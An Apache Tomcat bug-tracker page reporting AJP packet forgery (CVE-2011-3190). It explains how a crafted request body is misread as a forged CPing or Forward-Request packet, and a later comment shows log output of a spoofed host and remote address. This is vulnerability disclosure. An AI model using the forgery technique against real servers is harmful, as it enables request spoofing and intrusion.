Bug 51698 - ajp CPing/Forward-Request packet forgery, is a design decision? or a security vulnerability?
ajp CPing/Forward-Request packet forgery, is a design decision? or a security...
Status: RESOLVED FIXED
Product: Tomcat 7
Classification: Unclassified
Component: Connectors
7.0.20
PC All
: P2 normal (vote)
: ---
Assigned To: Tomcat Developers Mailing List
:
Depends on:
Blocks:
  Show dependency tree
 
Reported: 2011-08-20 07:54 UTC by zhh
Modified: 2014-11-05 18:35 UTC (History)
0 users



Attachments
ajp CPing packet forgery example (3.24 KB, application/octet-stream)
2011-08-20 07:54 UTC, zhh
Details
ajp Forward-Request packet forgery (10.83 KB, application/octet-stream)
2011-08-20 07:55 UTC, zhh
Details

Note You need to log in before you can comment on or make changes to this bug.
Description zhh 2011-08-20 07:54:08 UTC
Created attachment 27416 [details]
ajp CPing packet forgery example

because the ajp "Data" packet no "CodeType"
and tomcat adopts lazy-reading strategy for reading ajp "Data" packet,
(i.e., if you don't invoke request.getParameter("XXX"),tomcat does't read post request "Data" packet)

so,the current "Data" packet keeping in the socket inputstream,
the connection is keep-alive, ajp bio/nio procesor reading the next packet,
this time, is "Data" packet。

if the first byte of "Data" packet'length is 0x02(Code Type of Forward Request Packet) or 0x0A(Code Type of CPing Packet),
then tomcat will be in trouble.

please see the attachments.

firt example: ajp CPing packet forgery example

second example: ajp Forward-Request packet forgery
Comment 1 zhh 2011-08-20 07:55:51 UTC
Created attachment 27417 [details]
ajp Forward-Request packet forgery

second example: ajp Forward-Request packet forgery
Comment 2 Mark Thomas 2011-08-29 19:45:57 UTC
This issue has been allocated CVE-2011-3190.

The Tomcat security team strongly discourages the reporting of potential security vulnerabilities via public channels such as this issue tracker. Potential security vulnerabilities should be reported privately to security@tomcat.apache.org

This issue has been fixed in trunk, 7.0.x, 6.0.x and 5.5.x and will be included in 7.0.21, 6.0.34 and 5.5.34 onwards.
Comment 3 Edward Quick 2011-09-02 10:35:50 UTC
Hi there, I was testing this out to see if my site was vulnerable and got the following results. I'm not sure looking at the code comments in ForwardRequestForgeryExample.java if the output below means it's vulnerable and what exactly that exploited. Could you help me out a bit please?

Thanks,
Ed.

C:>java -cp . ForwardRequestForgeryExample
Sending AJP Forward-Request Packet...
End

$ tail -f catalina.out
Invoke HelloWorldExample.doPost method:
-------------------------------------------
Host: my.evil-site.com
RemoteAddr: 1.2.3.4
LocalPort: 999
woo: I am here
Comment 4 Mark Thomas 2011-09-02 10:49:16 UTC
Bugzilla is not a support forum. Please use the users mailing list.
Comment 5 Edward Quick 2011-09-02 13:04:04 UTC
Sorry about that. Will do.